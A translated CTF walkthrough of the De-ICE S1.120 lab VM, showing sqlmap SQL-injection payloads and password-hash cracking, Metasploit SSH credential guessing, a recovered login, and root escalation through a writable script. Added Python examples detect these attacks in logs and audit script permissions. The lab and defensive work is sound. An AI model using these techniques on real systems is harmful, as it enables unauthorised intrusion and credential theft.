Download link
http://hackingdojo.com/downloads/iso/De-ICE_S1.120.iso
Task information
Various 'internal' documents
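Hands-on walkthrough
Continuing from the previous post, which covered the S1.100 system
Information gathering
netdiscover shows that the IP is 192.168.1.120
Logging in as anonymous turns up nothing useful
The earlier passwords no longer work for logging in
Let's look at the web application
Capture the request with Burp Suite
Save this request to a file and use sqlmap to test it for an injection vulnerability
This one is not injectable, so try another page
This page has an injection vulnerability
Use sqlmap to retrieve the usernames and passwords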
    root@kali:/tmp# sqlmap -r 2 --users --passwords
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    [*] starting @ 20:57:51 /2019-02-27/
    [20:57:51] [INFO] parsing HTTP request from '2'
    [20:57:51] [INFO] resuming back-end DBMS 'mysql'
    [20:57:51] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1 AND 2998=2998
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=1 AND SLEEP(5)
        Type: UNION query
        Title: Generic UNION query (NULL) - 5 columns
        Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7176717171,0x63584353424a59567a6e52636942566d78746a676471796f446e70746d6862735849517846427372,0x717a6b7671),NULL,NULL-- JSxW
    ---
    [20:57:51] [INFO] the back-end DBMS is MySQL
    web application technology: Apache 2.2.11, PHP 5.2.9
    back-end DBMS: MySQL >= 5.0.12
    [20:57:51] [INFO] fetching database users
    database management system users [50]:
    [20:57:51] [INFO] fetching database users password hashes
    do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
    [20:57:54] [INFO] writing hashes to a temporary file '/tmp/sqlmap8lPFoA3319/sqlmaphashes-fmK_jw.txt'
    do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
    [20:57:56] [INFO] using hash method 'mysql_passwd'
    what dictionary do you want to use?
    [1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
    [2] custom dictionary file
    [3] file with list of dictionary files
    [20:58:02] [INFO] using default dictionary
    do you want to use common password suffixes? (slow!) [y/N] y
    [20:58:06] [INFO] starting dictionary-based cracking (mysql_passwd)
    [20:58:06] [INFO] starting 4 processes
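The three payload types sqlmap reports for the id parameter leave recognisable traces in the web server's access log. The following added example (not part of the original post) decodes the parameter from constructed log lines and classifies each request; the /page.php path, the log lines, and the assumption that id should be a non-negative integer are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines. /page.php is a hypothetical path; the decoded
# payloads follow the three injection types listed in the sqlmap output.
SAMPLE_LOG = """\
192.168.1.20 - - [27/Feb/2019:20:57:40 -0500] "GET /page.php?id=1 HTTP/1.1" 200 512
192.168.1.20 - - [27/Feb/2019:20:57:41 -0500] "GET /page.php?id=1%20AND%202998%3D2998 HTTP/1.1" 200 512
192.168.1.20 - - [27/Feb/2019:20:57:42 -0500] "GET /page.php?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 512
192.168.1.20 - - [27/Feb/2019:20:57:43 -0500] "GET /page.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20JSxW HTTP/1.1" 200 640
192.168.1.30 - - [27/Feb/2019:20:58:00 -0500] "GET /page.php?id=27 HTTP/1.1" 200 498
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# One signature per technique family reported for the id parameter.
RULES = [
    ("boolean-based blind", re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)),
    ("time-based blind", re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
]


def classify(value):
    """Return the injection techniques a decoded parameter value resembles."""
    if re.fullmatch(r"\d+", value):
        return []  # assumption: a legitimate id is a non-negative integer
    hits = [name for name, rx in RULES if rx.search(value)]
    return hits or ["non-integer value"]


def scan(log_text, param="id"):
    """Return one finding per request whose `param` is not a plain integer."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        # parse_qsl percent-decodes the value, so encoded payloads are seen in clear.
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key != param:
                continue
            techniques = classify(value)
            if techniques:
                findings.append({"ip": m["ip"], "time": m["ts"],
                                 "value": value, "techniques": techniques})
    return findings


def by_source(findings):
    """Group the techniques seen per client address."""
    out = {}
    for f in findings:
        out.setdefault(f["ip"], set()).update(f["techniques"])
    return out


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["ip"], ", ".join(f["techniques"]), repr(f["value"]))
```

The same integer check, applied in the application before the value reaches the SQL statement, closes the injection point that these log entries reveal.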
Build a wordlist to test the users' privileges
    msf5 > use auxiliary/scanner/ssh/ssh_login
    msf5 auxiliary(scanner/ssh/ssh_login) > show options
    Module options (auxiliary/scanner/ssh/ssh_login):
       Name              Current Setting  Required  Description
       ----              ---------------  --------  -----------
       BLANK_PASSWORDS   false            no        Try blank passwords for all users
       BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
       DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
       DB_ALL_PASS       false            no        Add all passwords in the current database to the list
       DB_ALL_USERS      false            no        Add all users in the current database to the list
       PASSWORD                           no        A specific password to authenticate with
       PASS_FILE                          no        File containing passwords, one per line
       RHOSTS                             yes       The target address range or CIDR identifier
       RPORT             22               yes       The target port
       STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
       THREADS           1                yes       The number of concurrent threads
       USERNAME                           no        A specific username to authenticate as
       USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
       USER_AS_PASS      false            no        Try the username as the password for all users
       USER_FILE                          no        File containing usernames, one per line
       VERBOSE           false            yes       Whether to print output for all attempts
    msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.120
    RHOSTS => 192.168.1.120
    msf5 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE test
    USERPASS_FILE => test
    msf5 auxiliary(scanner/ssh/ssh_login) > run
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
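A credential run like the ssh_login scan above appears in the sshd log as one source address authenticating as many different accounts within seconds. The following added example (not part of the original post) finds such bursts with a sliding window; the log lines, host name, addresses, thresholds and the year passed to the parser are constructed or assumed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd log lines (host name, users, addresses and ports are made up).
SAMPLE_AUTH_LOG = """\
Feb 27 21:48:53 host1 sshd[4101]: Accepted password for user01 from 192.168.1.20 port 40001 ssh2
Feb 27 21:48:53 host1 sshd[4102]: Accepted password for user02 from 192.168.1.20 port 40002 ssh2
Feb 27 21:48:54 host1 sshd[4103]: Failed password for user03 from 192.168.1.20 port 40003 ssh2
Feb 27 21:48:54 host1 sshd[4104]: Accepted password for user04 from 192.168.1.20 port 40004 ssh2
Feb 27 21:48:55 host1 sshd[4105]: Accepted password for user05 from 192.168.1.20 port 40005 ssh2
Feb 27 21:48:55 host1 sshd[4106]: Accepted password for user06 from 192.168.1.20 port 40006 ssh2
Feb 27 21:50:10 host1 sshd[4110]: Accepted password for user02 from 192.168.1.50 port 51000 ssh2
Feb 27 22:30:00 host1 sshd[4120]: Accepted password for user02 from 192.168.1.50 port 51001 ssh2
"""

EVENT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse(lines, year=2019):
    """Yield (timestamp, ip, user, accepted) for each password-auth event.

    Traditional syslog timestamps carry no year, so the caller supplies one.
    """
    for line in lines:
        m = EVENT_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["ip"], m["user"], m["result"] == "Accepted"


def find_bursts(lines, window=timedelta(seconds=60), min_users=5):
    """Return {ip: alert} for sources that logged in successfully as at least
    `min_users` distinct accounts inside `window`. Lines must be in time order."""
    recent = defaultdict(deque)      # ip -> (ts, user) successes still inside the window
    failures = defaultdict(int)      # ip -> failed attempts, reported as context
    alerts = {}
    for ts, ip, user, accepted in parse(lines):
        if not accepted:
            failures[ip] += 1
            continue
        q = recent[ip]
        q.append((ts, user))
        while ts - q[0][0] > window:  # drop events that fell out of the window
            q.popleft()
        users = {u for _, u in q}
        best = alerts.get(ip)
        if len(users) >= min_users and (best is None or len(users) > len(best["users"])):
            alerts[ip] = {"first": q[0][0], "last": ts, "users": sorted(users)}
    for ip, alert in alerts.items():
        alert["failed"] = failures[ip]
    return alerts


if __name__ == "__main__":
    for ip, a in find_bursts(SAMPLE_AUTH_LOG.splitlines()).items():
        span = (a["last"] - a["first"]).total_seconds()
        print(f"{ip}: {len(a['users'])} accounts in {span:.0f}s, {a['failed']} failures")
```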
The ccoffee account turns out to have broader privileges, so log in with it and take a look
Success: 'ccoffee:1234' 'uid=1023(ccoffee) gid=100(users) groups=100(users),102(admin)
getlogs.sh is executed as root, so we can modify the file and overwrite its contents to escalate privileges
Source: freebuf.com 2019-02-28 23:48:18 by: 陌度
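Because getlogs.sh runs as root, anyone who can write to it, or to a directory on its path, controls what root executes. The following added example (not part of the original post) audits the ownership and mode of such a script and of every parent directory; the page does not give the script's location or permissions, so the demo path and mode are hypothetical.

```python
import os
import stat


def check_mode(mode, uid, gid):
    """Return the reasons a non-root user could modify an object with this
    mode and ownership. An empty list means only root can change it."""
    problems = []
    # In a sticky directory (such as /tmp) users cannot replace files they do not own.
    sticky_dir = stat.S_ISDIR(mode) and bool(mode & stat.S_ISVTX)
    if uid != 0:
        problems.append(f"owned by uid {uid}, not root")
    if mode & stat.S_IWOTH and not sticky_dir:
        problems.append("world-writable")
    if mode & stat.S_IWGRP and gid != 0 and not sticky_dir:
        problems.append(f"writable by gid {gid}")
    return problems


def audit_root_script(path):
    """Check a script that root executes, plus every directory above it.

    A writable parent directory is as dangerous as a writable file, because
    the script can be renamed away and replaced. Returns (path, reason) pairs.
    """
    current = os.path.realpath(path)   # follow symlinks to the file really executed
    findings = []
    while True:
        st = os.stat(current)
        for reason in check_mode(st.st_mode, st.st_uid, st.st_gid):
            findings.append((current, reason))
        parent = os.path.dirname(current)
        if parent == current:          # reached the filesystem root
            break
        current = parent
    return findings


def audit_many(paths):
    """Audit several root-executed scripts; keep only those with findings."""
    report = {}
    for p in paths:
        found = audit_root_script(p)
        if found:
            report[p] = found
    return report


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "getlogs.sh")   # hypothetical location
        with open(script, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(script, 0o757)                  # hypothetical weak mode
        for where, why in audit_root_script(script):
            print(f"{where}: {why}")
```

Feed it the script paths named in sudoers entries and root's cron jobs; a clean result is an empty report.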